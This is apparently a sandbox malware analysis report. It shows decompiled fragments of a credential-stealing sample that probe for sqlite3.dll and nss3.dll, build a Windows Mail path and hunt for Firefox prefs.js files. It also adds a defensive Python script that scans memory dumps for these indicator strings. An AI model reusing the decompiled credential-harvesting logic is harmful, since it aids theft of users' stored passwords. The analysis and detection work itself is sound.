Memory Dump Source
• Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: ??2@??3@memcpymemset
• String ID:
• API String ID: 1865533344-0
• Opcode ID: 51d873ac656c15b7a7b4c95b09edac65cc2407af7c36c5c472b2660f0814b8dc
• Instruction ID: 30667c860212afb2fcb1bf0ba773cc68d22997902d766bb0abd15f5aaececc89
• Opcode Fuzzy Hash: 51d873ac656c15b7a7b4c95b09edac65cc2407af7c36c5c472b2660f0814b8dc
• Instruction Fuzzy Hash: 81118F71204601AFD328DF1DD881A27F7E6FFD8340B21892EE59B87391DA35E841CB54
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 37%
E0040EFAE(char* __esi, char _a4, intOrPtr _a8) {
	void* _v8;
	char* _v16;
	intOrPtr _v20;
	intOrPtr _v24;
	intOrPtr _v28;
	intOrPtr _v32;
	intOrPtr _v36;
	char _v40;
	char _v304;
	char* _t18;
	char* _t22;
	char* _t23;
	intOrPtr* _t24;
	intOrPtr* _t26;
	intOrPtr _t30;
	void* _t35;
	char* _t36;

	_t18 =  &_v8;
	_t30 = 0;
	__imp__SHGetMalloc(_t18);                        /* obtain the shell IMalloc allocator into _v8 */
	if(_t18 >= 0) {
		/* _v40.._v16 is a BROWSEINFOA structure built on the stack:
		   hwndOwner = _a4, pidlRoot = 0, pszDisplayName = 0, lpszTitle = _a8,
		   ulFlags = 4 (BIF_STATUSTEXT), lpfn = E0040EF36, lParam = __esi (output buffer) */
		_v40 = _a4;
		_v28 = _a8;
		_t22 =  &_v40;
		_v36 = 0;
		_v32 = 0;
		_v24 = 4;
		_v20 = E0040EF36;
		_v16 = __esi;
		__imp__SHBrowseForFolderA(_t22, _t35);      /* _t35 is an uninitialised decompiler temporary, not a real argument */
		_t36 = _t22;                                /* returned PIDL of the chosen folder, or NULL */
		if(_t36 != 0) {
			_t23 =  &_v304;
			__imp__SHGetPathFromIDListA(_t36, _t23); /* resolve the PIDL to a path in _v304 */
			if(_t23 != 0) {
				_t30 = 1;
				strcpy(__esi,  &_v304);              /* unbounded copy of the path into the caller-supplied buffer */
			}
			_t24 = _v8;
			 *((intOrPtr*)( *_t24 + 0x14))(_t24, _t36); /* IMalloc::Free(pidl) through vtable slot 0x14 */
			_t26 = _v8;
			 *((intOrPtr*)( *_t26 + 8))(_t26);         /* IMalloc::Release() through vtable slot 8 */
		}
	}
	return _t30;                                     /* 1 if a folder was selected and its path copied */
}

APIs
• SHGetMalloc.SHELL32(?), ref: 0040EFBE
• SHBrowseForFolderA.SHELL32(?), ref: 0040EFF0
• SHGetPathFromIDListA.SHELL32(00000000,?), ref: 0040F004
• strcpy.MSVCRT(?,?), ref: 0040F017
Memory Dump Source
• Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: BrowseFolderFromListMallocPathstrcpy
• String ID:
• API String ID: 409945605-0
• Opcode ID: 363e444f0183eb3209581039a296e9ed2a0e0cb40b9c5b89ec9b93d888cfbacc
• Instruction ID: 0bece651b4572a5d25d0fced66708dfb83f65978f11dfbdadd7c1eadd6bf4f14
• Opcode Fuzzy Hash: 363e444f0183eb3209581039a296e9ed2a0e0cb40b9c5b89ec9b93d888cfbacc
• Instruction Fuzzy Hash: DD11F7B5900208AFCB10DFA9D9889EEBBFCFB49310F10447AEA05E7241D779DA458B64
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 80%
E0040A437(void* __esi) {
	void* _v260;
	char _v516;
	void* __ebx;
	char* _t16;
	signed short _t25;
	signed short _t27;
	void* _t28;

	_t28 = __esi;
	/* value derived from the object field at +0x370 is pushed first and consumed as the sprintf vararg */
	_push(E00408647( *((intOrPtr*)(__esi + 0x370))));
	_t25 = 4;
	sprintf( &_v260, E004078FF(_t25));                /* format string is string-table entry 4 (E004078FF wraps LoadStringA) */
	_t16 = E00408BDE( *((intOrPtr*)(__esi + 0x370)), 0);
	if(_t16 > 0) {
		_push(_t16);                                  /* second vararg for the next sprintf */
		_t27 = 5;
		sprintf( &_v516, E004078FF(_t27));            /* string-table entry 5 formatted into _v516 */
		_t16 = strcat( &_v260,  &_v516);              /* unbounded append onto the 256-byte stack buffer */
	}
	if( *((intOrPtr*)(_t28 + 0x108)) != 0) {
		/* hand the composed text to the window stored at +0x114 via WM_USER+1 (0x401) */
		return SendMessageA( *(_t28 + 0x114), 0x401, 0,  &_v260);
	}
	return _t16;
}

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 004078FF: LoadStringA.USER32 ref: 004079C8
                                                                                                                                                      • Part of subcall function 004078FF: memcpy.MSVCRT ref: 00407A07
                                                                                                                                                    • sprintf.MSVCRT ref: 0040A45D
                                                                                                                                                    • SendMessageA.USER32 ref: 0040A4C0
                                                                                                                                                      • Part of subcall function 004078FF: strcpy.MSVCRT(004172C0,strings,?,?,00408822,?,?,?,?,?,00000000,75144DE0), ref: 0040797A
                                                                                                                                                      • Part of subcall function 004078FF: strlen.MSVCRT ref: 00407998
                                                                                                                                                    • sprintf.MSVCRT ref: 0040A487
                                                                                                                                                    • strcat.MSVCRT(?,?,?,00000000,00000000), ref: 0040A49A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: sprintf$LoadMessageSendStringmemcpystrcatstrcpystrlen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 919693953-0
                                                                                                                                                    • Opcode ID: 90207433884269e3a26f13c39c42963f5ff8dc1025de2d2684d4a636a9e51624
                                                                                                                                                    • Instruction ID: 75288aada6eb4f7a447a9cf13bdf828529425e42ebb21a5188d22772f738aad9
                                                                                                                                                    • Opcode Fuzzy Hash: 90207433884269e3a26f13c39c42963f5ff8dc1025de2d2684d4a636a9e51624
                                                                                                                                                    • Instruction Fuzzy Hash: 2601DBB250030466D721B775DD86FEB73AC6F00304F40447BB74AF6082DABCE9808B29
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                    			E0040F3BA(char* _a4) {
                                                                                                                                                    				void _v267;
                                                                                                                                                    				char _v268;
                                                                                                                                                    				int _t12;
                                                                                                                                                    				signed int _t16;
                                                                                                                                                    
                                                                                                                                                    				_v268 = 0;
                                                                                                                                                    				memset( &_v267, 0, 0x104);
                                                                                                                                                    				_t12 = strlen(_a4);
                                                                                                                                                    				_t5 = strlen("sqlite3.dll") + 1; // 0x1
                                                                                                                                                    				if(_t12 + _t5 >= 0x104) {
                                                                                                                                                    					_v268 = 0;
                                                                                                                                                    				} else {
                                                                                                                                                    					E004062AD( &_v268, _a4, "sqlite3.dll");
                                                                                                                                                    				}
                                                                                                                                                    				_t16 = E0040614B( &_v268);
                                                                                                                                                    				asm("sbb eax, eax");
                                                                                                                                                    				return  ~( ~_t16);
                                                                                                                                                    			}








                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 0040F3DC
                                                                                                                                                    • strlen.MSVCRT ref: 0040F3E4
                                                                                                                                                    • strlen.MSVCRT ref: 0040F3F1
                                                                                                                                                      • Part of subcall function 004062AD: strcpy.MSVCRT(00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062B5
                                                                                                                                                      • Part of subcall function 004062AD: strcat.MSVCRT(00000000,00000000,00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062C4
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: strlen$memsetstrcatstrcpy
                                                                                                                                                    • String ID: sqlite3.dll
                                                                                                                                                    • API String ID: 1581230619-1155512374
                                                                                                                                                    • Opcode ID: 3cb808dc3fd31d135458d717301fbb3bbf110c950f4aa8e177593d82486e3e62
                                                                                                                                                    • Instruction ID: fec7c4afce47c381fe657df57b8ff367c384fd882de8837a2d08c6e6e293e1f2
                                                                                                                                                    • Opcode Fuzzy Hash: 3cb808dc3fd31d135458d717301fbb3bbf110c950f4aa8e177593d82486e3e62
                                                                                                                                                    • Instruction Fuzzy Hash: 4BF02D3144C1286ADB10E769DC45FCA7BAC8FA1318F1040B7F586E60D2D9B89AC98668
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E004098F4(intOrPtr* __ecx, intOrPtr _a4) {
                                                                                                                                                    				void _v259;
                                                                                                                                                    				char _v260;
                                                                                                                                                    				void _v515;
                                                                                                                                                    				char _v516;
                                                                                                                                                    				void* __esi;
                                                                                                                                                    				void* _t15;
                                                                                                                                                    				intOrPtr* _t24;
                                                                                                                                                    				char* _t26;
                                                                                                                                                    
                                                                                                                                                    				_t24 = __ecx;
                                                                                                                                                    				_v260 = 0;
                                                                                                                                                    				memset( &_v259, 0, 0xfe);
                                                                                                                                                    				_v516 = 0;
                                                                                                                                                    				memset( &_v515, 0, 0xfe);
                                                                                                                                                    				_t15 =  *((intOrPtr*)( *_t24 + 0x20))();
                                                                                                                                                    				_t26 =  &_v260;
                                                                                                                                                    				E00409018(_t26, _t15);
                                                                                                                                                    				sprintf( &_v516, "</%s>\r\n", _t26);
                                                                                                                                                    				return E00405EFD(_a4,  &_v516);
                                                                                                                                                    			}












                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 00409917
                                                                                                                                                    • memset.MSVCRT ref: 0040992D
                                                                                                                                                      • Part of subcall function 00409018: strcpy.MSVCRT(00000000,?,00409701,?,?,?), ref: 0040901D
                                                                                                                                                      • Part of subcall function 00409018: _strlwr.MSVCRT ref: 00409060
                                                                                                                                                    • sprintf.MSVCRT ref: 00409957
                                                                                                                                                      • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                                                                                                                      • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,75144DE0,00000000,?,?,004092ED,00000001,00412B1C,75144DE0), ref: 00405F17
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memset$FileWrite_strlwrsprintfstrcpystrlen
                                                                                                                                                    • String ID: </%s>
                                                                                                                                                    • API String ID: 3202206310-259020660
                                                                                                                                                    • Opcode ID: 8cbe72e2fc2d9776a491eb44f024350a6eb65ee3e03a862d51b3af92fd5e6b23
                                                                                                                                                    • Instruction ID: adbfc7571eef3522ba50f6b4148bdf50dea618c8f0168b60c77ad4ff43fabaf4
                                                                                                                                                    • Opcode Fuzzy Hash: 8cbe72e2fc2d9776a491eb44f024350a6eb65ee3e03a862d51b3af92fd5e6b23
                                                                                                                                                    • Instruction Fuzzy Hash: B201D1729001297AD720A719CC45FDA7AACAF84304F0400FAB60AF3182DA749F848BA8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00406734(char* __edi, char* _a4) {
                                                                                                                                                    				char* _t12;
                                                                                                                                                    				int _t13;
                                                                                                                                                    
                                                                                                                                                    				_t12 = __edi;
                                                                                                                                                    				_t13 = strlen(__edi);
                                                                                                                                                    				if(strlen(_a4) + _t13 < 0x104) {
                                                                                                                                                    					_t2 =  &_a4; // 0x410d64
                                                                                                                                                    					strcat(_t13 + __edi,  *_t2);
                                                                                                                                                    				}
                                                                                                                                                    				return _t12;
                                                                                                                                                    			}






                                                                                                                                                    APIs
                                                                                                                                                    • strlen.MSVCRT ref: 00406736
                                                                                                                                                    • strlen.MSVCRT ref: 00406741
                                                                                                                                                    • strcat.MSVCRT(00000000,dA,0000001C,00410D64,\Microsoft\Windows Mail,?,?,?), ref: 00406758
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: strlen$strcat
                                                                                                                                                    • String ID: dA
                                                                                                                                                    • API String ID: 2335785903-82490789
                                                                                                                                                    • Opcode ID: 8b0d949a9835eed74c78f3475c18959fb5a6152aa5369579c15a011cca720fff
                                                                                                                                                    • Instruction ID: 8adb96eafe51badce5d1f431fd236154b3227263db9247bb640c15329514921a
                                                                                                                                                    • Opcode Fuzzy Hash: 8b0d949a9835eed74c78f3475c18959fb5a6152aa5369579c15a011cca720fff
                                                                                                                                                    • Instruction Fuzzy Hash: EFD05E3350852036C5152316BC429DE5B82CBC037CB15445FF609921A1E93D84D1859D
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%
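The three functions above are the dependency probes and report writer of the embedded password-recovery tooling: E0040F3BA builds "<dir>sqlite3.dll" (with nss3.dll appearing in the same call chain) under a MAX_PATH (0x104) bound and checks whether it exists, E00406734 appends "\Microsoft\Windows Mail" to a base path under the same bound, and E004098F4 writes a closing "</%s>\r\n" tag to the report file through WriteFile. Those literal strings are what a responder can pivot on when a dump of the hollowed vbc process (process 15, region 0x400000 in this report) is in hand. The Python below is an added example, not part of this Joe Sandbox report or of the sample: it scans a memory dump for the same string indicators and summarises which capabilities they imply. The dump bytes are constructed here for illustration, and the indicator names are labels chosen for this example.

```python
"""Triage helper: locate the string indicators surfaced in the decompiled
functions above inside a raw process memory dump.

Added example; not part of the Joe Sandbox report or the analysed sample.
SAMPLE_DUMP below is constructed, not the real 0x400000 region dump.
"""
import re
from typing import Dict, List, Tuple

# Indicators lifted from the listing. Kept as raw bytes because the sample
# works with ANSI (char*) strings, so a UTF-16 search would miss them.
INDICATORS: Dict[str, bytes] = {
    "sqlite3_dll": b"sqlite3.dll",                 # E0040F3BA probe target
    "nss3_dll": b"nss3.dll",                       # seen in the E004062AD call chain
    "windows_mail_path": b"\\Microsoft\\Windows Mail",  # E00406734 strcat argument
    "xml_close_tag_fmt": b"</%s>\r\n",             # E004098F4 sprintf format
}


def find_indicators(dump: bytes) -> List[Tuple[str, int]]:
    """Return (indicator_name, offset) for every occurrence, ordered by offset."""
    hits: List[Tuple[str, int]] = []
    for name, needle in INDICATORS.items():
        for match in re.finditer(re.escape(needle), dump):
            hits.append((name, match.start()))
    return sorted(hits, key=lambda hit: hit[1])


def classify(dump: bytes) -> Dict[str, object]:
    """Map the raw hits onto the behaviours the decompiled code implements.

    browser_db_probe: both DLLs the Firefox/SQLite credential reader needs
                      are referenced, matching the sqlite3.dll / nss3.dll probe.
    mail_store_probe: the Windows Mail profile path fragment is present.
    xml_report_writer: the closing-tag format string of the report writer
                       is present.
    """
    hits = find_indicators(dump)
    present = {name for name, _ in hits}
    return {
        "hits": hits,
        "browser_db_probe": {"sqlite3_dll", "nss3_dll"} <= present,
        "mail_store_probe": "windows_mail_path" in present,
        "xml_report_writer": "xml_close_tag_fmt" in present,
    }


# Constructed stand-in for a process memory dump: a fake header, some filler,
# and the indicator strings NUL-terminated the way the binary stores them.
SAMPLE_DUMP: bytes = (
    b"\x00" * 16 + b"MZ" + b"\x00" * 30
    + b"sqlite3.dll\x00" + b"\x90" * 8 + b"nss3.dll\x00"
    + b"\x00" * 8 + b"\\Microsoft\\Windows Mail\x00"
    + b"</%s>\r\n\x00" + b"\xcc" * 16
)


if __name__ == "__main__":
    verdict = classify(SAMPLE_DUMP)
    for name, offset in verdict["hits"]:
        print(f"{offset:#010x}  {name}")
    for key in ("browser_db_probe", "mail_store_probe", "xml_report_writer"):
        print(f"{key}: {verdict[key]}")
```

To use it on the real artefact, read the .sdmp file named under "Memory Dump Source" into `dump` and call `classify(dump)`; offsets are relative to the start of the dump, so add the region base (0x400000 here) to compare against the addresses in the listing. Because the sample uses process hollowing, run the scan on the dump of the hollowed process rather than on the file on disk, where these strings are packed.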

                                                                                                                                                    C-Code - Quality: 89%
                                                                                                                                                    			E00402221(void* __ecx, intOrPtr _a4, char* _a8) {
                                                                                                                                                    				void* __ebx;
                                                                                                                                                    				intOrPtr _t22;
                                                                                                                                                    				void* _t23;
                                                                                                                                                    				void* _t25;
                                                                                                                                                    				void* _t27;
                                                                                                                                                    				void* _t29;
                                                                                                                                                    				void* _t32;
                                                                                                                                                    				void* _t36;
                                                                                                                                                    				signed short _t42;
                                                                                                                                                    				char* _t47;
                                                                                                                                                    				void* _t48;
                                                                                                                                                    				intOrPtr _t49;
                                                                                                                                                    				intOrPtr _t50;
                                                                                                                                                    				void* _t57;
                                                                                                                                                    
                                                                                                                                                    				_t22 = _a4;
                                                                                                                                                    				_t57 = _t22 - 6;
                                                                                                                                                    				_t47 = _a8;
                                                                                                                                                    				_t48 = __ecx;
                                                                                                                                                    				 *_t47 = 0;
                                                                                                                                                    				if(_t57 > 0) {
                                                                                                                                                    					_t23 = _t22 - 7;
                                                                                                                                                    					if(_t23 == 0) {
                                                                                                                                                    						return __ecx + 0x214;
                                                                                                                                                    					}
                                                                                                                                                    					_t25 = _t23 - 1;
                                                                                                                                                    					if(_t25 == 0) {
                                                                                                                                                    						return __ecx + 0x294;
                                                                                                                                                    					}
                                                                                                                                                    					_t27 = _t25 - 1;
                                                                                                                                                    					if(_t27 == 0) {
                                                                                                                                                    						return __ecx + 0x314;
                                                                                                                                                    					}
                                                                                                                                                    					_t29 = _t27 - 1;
                                                                                                                                                    					if(_t29 == 0) {
                                                                                                                                                    						_t49 =  *((intOrPtr*)(__ecx + 0x3a0));
                                                                                                                                                    						if(_t49 < 1 || _t49 > 7) {
                                                                                                                                                    							if(_t49 < 8 || _t49 > 0xe) {
                                                                                                                                                    								if(_t49 < 0xf || _t49 > 0x19) {
                                                                                                                                                    									if(_t49 < 0x1a || _t49 > 0x2d) {
                                                                                                                                                    										if(_t49 < 0x2e) {
                                                                                                                                                    											L16:
                                                                                                                                                    											return _t47;
                                                                                                                                                    										}
                                                                                                                                                    										_t42 = 0x519;
                                                                                                                                                    									} else {
                                                                                                                                                    										_t42 = 0x518;
                                                                                                                                                    									}
                                                                                                                                                    								} else {
                                                                                                                                                    									_t42 = 0x517;
                                                                                                                                                    								}
                                                                                                                                                    							} else {
                                                                                                                                                    								_t42 = 0x516;
                                                                                                                                                    							}
                                                                                                                                                    							goto L20;
                                                                                                                                                    						} else {
                                                                                                                                                    							_t42 = 0x515;
                                                                                                                                                    							L20:
                                                                                                                                                    							return E004078FF(_t42);
                                                                                                                                                    						}
                                                                                                                                                    					}
                                                                                                                                                    					_t32 = _t29 - 1;
                                                                                                                                                    					if(_t32 == 0) {
                                                                                                                                                    						return __ecx + 0x190;
                                                                                                                                                    					}
                                                                                                                                                    					if(_t32 != 1) {
                                                                                                                                                    						goto L16;
                                                                                                                                                    					}
                                                                                                                                                    					_t50 =  *((intOrPtr*)(__ecx + 0x39c));
                                                                                                                                                    					L14:
                                                                                                                                                    					if(_t50 != 0) {
                                                                                                                                                    						_push(0xa);
                                                                                                                                                    						_push(_t47);
                                                                                                                                                    						_push(_t50);
                                                                                                                                                    						L0041158E();
                                                                                                                                                    					}
                                                                                                                                                    					goto L16;
                                                                                                                                                    				}
                                                                                                                                                    				if(_t57 == 0) {
                                                                                                                                                    					_t42 =  *((intOrPtr*)(__ecx + 0x210)) + 0x320;
                                                                                                                                                    					goto L20;
                                                                                                                                                    				}
                                                                                                                                                    				if(_t22 == 0xfffffff6) {
                                                                                                                                                    					_t36 = E004078FF( *((intOrPtr*)(__ecx + 0x8c)) + 0x384);
                                                                                                                                                    					sprintf(_t47, "%s  %s  %s", E004078FF( *((intOrPtr*)(_t48 + 0x210)) + 0x320), _t48 + 0x110, _t36);
                                                                                                                                                    					goto L16;
                                                                                                                                                    				}
                                                                                                                                                    				if(_t22 == 0) {
                                                                                                                                                    					return __ecx + 0xc;
                                                                                                                                                    				}
                                                                                                                                                    				if(_t22 == 1) {
                                                                                                                                                    					_t42 =  *((intOrPtr*)(__ecx + 0x8c)) + 0x384;
                                                                                                                                                    					goto L20;
                                                                                                                                                    				}
                                                                                                                                                    				if(_t22 == 2) {
                                                                                                                                                    					return __ecx + 0x90;
                                                                                                                                                    				}
                                                                                                                                                    				if(_t22 == 3) {
                                                                                                                                                    					return __ecx + 0x110;
                                                                                                                                                    				}
                                                                                                                                                    				if(_t22 == 4) {
                                                                                                                                                    					_t50 =  *((intOrPtr*)(__ecx + 0x394));
                                                                                                                                                    					goto L14;
                                                                                                                                                    				}
                                                                                                                                                    				if(_t22 != 5) {
                                                                                                                                                    					goto L16;
                                                                                                                                                    				}
                                                                                                                                                    				if( *((intOrPtr*)(__ecx + 0x398)) == 0) {
                                                                                                                                                    					_push(0x10);
                                                                                                                                                    				} else {
                                                                                                                                                    					_push(0xf);
                                                                                                                                                    				}
                                                                                                                                                    				_pop(_t42);
                                                                                                                                                    				goto L20;
                                                                                                                                                    			}

Instruction addresses for the decompiled lines above (per-line alignment lost in extraction; 0x00000000 marks lines with no address):
0x00402221 0x00402225 0x0040222b 0x0040222f 0x00402231 0x00402234 0x00402312 0x00402315 0x00000000 0x004023c2 0x0040231b 0x0040231c 0x00000000 0x004023ba 0x00402322 0x00402323 0x00000000 0x004023b2 0x00402329 0x0040232a 0x00402349 0x00402352 0x00402366 0x0040237a 0x0040238e 0x004023a2 0x0040228e 0x00000000 0x0040228e 0x004023a8 0x00402395 0x00402395 0x00402395 0x00402381 0x00402381 0x00402381 0x0040236d 0x0040236d 0x0040236d 0x00000000 0x00402359 0x00402359 0x004022b7 0x00000000 0x004022b7 0x00402352 0x0040232c 0x0040232d 0x00000000 0x00402341 0x00402330 0x00000000 0x00000000 0x00402336 0x0040227e 0x00402280 0x00402282 0x00402284 0x00402285 0x00402286 0x0040228b 0x00000000 0x00402280 0x0040223a 0x0040230a 0x00000000 0x0040230a 0x00402243 0x004022d5 0x004022fa 0x00000000 0x004022ff 0x0040224b 0x00000000 0x004022c1 0x00402250 0x004022b1 0x00000000 0x004022b1 0x00402255 0x00000000 0x004022a0 0x0040225a 0x00000000 0x00402295 0x0040225f 0x00402278 0x00000000 0x00402278 0x00402264 0x00000000 0x00000000 0x0040226d 0x00402274 0x0040226f 0x0040226f 0x0040226f 0x00402271 0x00000000

APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: _ultoasprintf
• String ID: %s %s %s
• API String ID: 432394123-3850900253
• Opcode ID: 7ea893eb970b9f9c330beb309c0cc5b8cf8f56ebc8930b7fcefd01bde23561b2
• Instruction ID: d9c328b9b741649d7ae815da5d558f3ae5f994b92098e95e7c9169487fd3f945
• Opcode Fuzzy Hash: 7ea893eb970b9f9c330beb309c0cc5b8cf8f56ebc8930b7fcefd01bde23561b2
• Instruction Fuzzy Hash: C4410932504B15C7C636956487CCBEBA264A742304F6508BFEC5AF72D1C2FCAD41976B
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 89%
	/* Decompiler output (Joe Sandbox IDA plugin). Recursively enumerates a directory tree
	   with "*.*" and, once at least two levels deep, looks for a file named "prefs.js"
	   (the Firefox profile preferences file); each hit is handed to E0040D1EC. */
	E0040D37A(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
		char _v328;
		char _v652;
		char _v928;
		char _v1296;
		signed int _v1300;
		void* __esi;
		char* _t26;
		intOrPtr* _t43;

		_v1300 = _v1300 | 0xffffffff;   /* find handle initialised to INVALID_HANDLE_VALUE */
		_v1296 = 0;
		_v328 = 0;
		_v652 = 0;
		_t43 = __ecx;
		E00406E68( &_v1300, __eflags, "*.*", _a4);   /* FindFirstFile-style enumeration of _a4 */
		while(E00406EC3( &_v1300) != 0) {            /* next entry */
			__eflags = E00406E2D( &_v1300);          /* non-zero when the entry is a directory */
			if(__eflags == 0) {
				__eflags = _a8 - 1;
				if(_a8 > 1) {                        /* only files two or more levels deep */
					_t26 =  &_v928;
					_push("prefs.js");
					_push(_t26);
					L004115B2();                     /* appears to compare the entry name with "prefs.js"; 0 on match */
					__eflags = _t26;
					if(_t26 == 0) {
						__eflags = E0040614B( &_v652);
						if(__eflags != 0) {
							E0040D1EC(_t43, __eflags,  &_v652);   /* process the located prefs.js */
						}
					}
				}
			} else {
				_a8 = _a8 + 1;                       /* descend one level and recurse */
				E0040D37A(_t43, __eflags,  &_v652, _a8);
			}
		}
		E00406F5B( &_v1300);                         /* FindClose-style cleanup */
		return 1;
	}
Instruction addresses: 0x0040d386, 0x0040d391, 0x0040d395, 0x0040d39c, 0x0040d3ac, 0x0040d3ae, 0x0040d418, 0x0040d3be, 0x0040d3c0, 0x0040d3d9, 0x0040d3dd, 0x0040d3df, 0x0040d3e6, 0x0040d3eb, 0x0040d3ec, 0x0040d3f1, 0x0040d3f5, 0x0040d404, 0x0040d407, 0x0040d413, 0x0040d413, 0x0040d407, 0x0040d3f5, 0x0040d3c2, 0x0040d3c2, 0x0040d3d2, 0x0040d3d2, 0x0040d3c0, 0x0040d429, 0x0040d435

Strings
Memory Dump Source
• Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: strlen$FileFindFirst
• String ID: *.*$prefs.js
• API String ID: 2516927864-1592826420
• Opcode ID: 3e701ac251ef0c92007320573df48c8a58c02c849dde9726d81be77e97480d08
• Instruction ID: f0fdac10561689b7590a9d658f3f63ad40faf00aab35cef1d8d79f75c7dff1a2
• Opcode Fuzzy Hash: 3e701ac251ef0c92007320573df48c8a58c02c849dde9726d81be77e97480d08
• Instruction Fuzzy Hash: 2711E731408349AAD720EAA5C8019DB77DC9F85324F00493FF869E21C1DB38E61E87AB
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
	/* Decompiler output (Joe Sandbox IDA plugin). Fills an OPENFILENAMEA structure on the
	   stack and shows the common "Save As" dialog; on success the chosen path is copied
	   into the caller's buffer (__edi) and the selected filter index is written back
	   through __ebx. */
	E00406680(intOrPtr* __ebx, intOrPtr __ecx, char* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
		intOrPtr _v20;
		intOrPtr _v28;
		intOrPtr _v32;
		signed int _v36;
		signed int _v44;
		intOrPtr _v48;
		char* _v52;
		intOrPtr _v56;
		signed int _v64;
		intOrPtr _v68;
		intOrPtr _v76;
		struct tagOFNA _v80;
		intOrPtr _t23;
		intOrPtr* _t33;
		intOrPtr _t34;
		char* _t38;

		_t38 = __edi;
		_t34 = __ecx;
		_t33 = __ebx;
		_t23 = 1;
		if(__ebx != 0) {
			_t23 =  *__ebx;               /* caller-supplied initial filter index */
		}
		_v64 = _v64 & 0x00000000;
		_v44 = _v44 & 0x00000000;
		_v36 = _v36 & 0x00000000;
		_v56 = _t23;                      /* nFilterIndex */
		_v32 = _a8;                       /* lpstrTitle */
		_v20 = _a12;                      /* lpstrDefExt */
		_v76 = _t34;                      /* hwndOwner */
		_v80 = 0x4c;                      /* lStructSize = OPENFILENAME_SIZE_VERSION_400 */
		_v68 = _a4;                       /* lpstrFilter */
		_v52 = _t38;                      /* lpstrFile: output buffer */
		_v48 = 0x104;                     /* nMaxFile = MAX_PATH */
		_v28 = 0x80806;                   /* Flags */
		if(GetSaveFileNameA( &_v80) == 0) {
			return 0;                     /* user cancelled or dialog failed */
		} else {
			if(_t33 != 0) {
				 *_t33 = _v56;            /* return the filter index the user picked */
			}
			strcpy(_t38, _v52);
			return 1;
		}
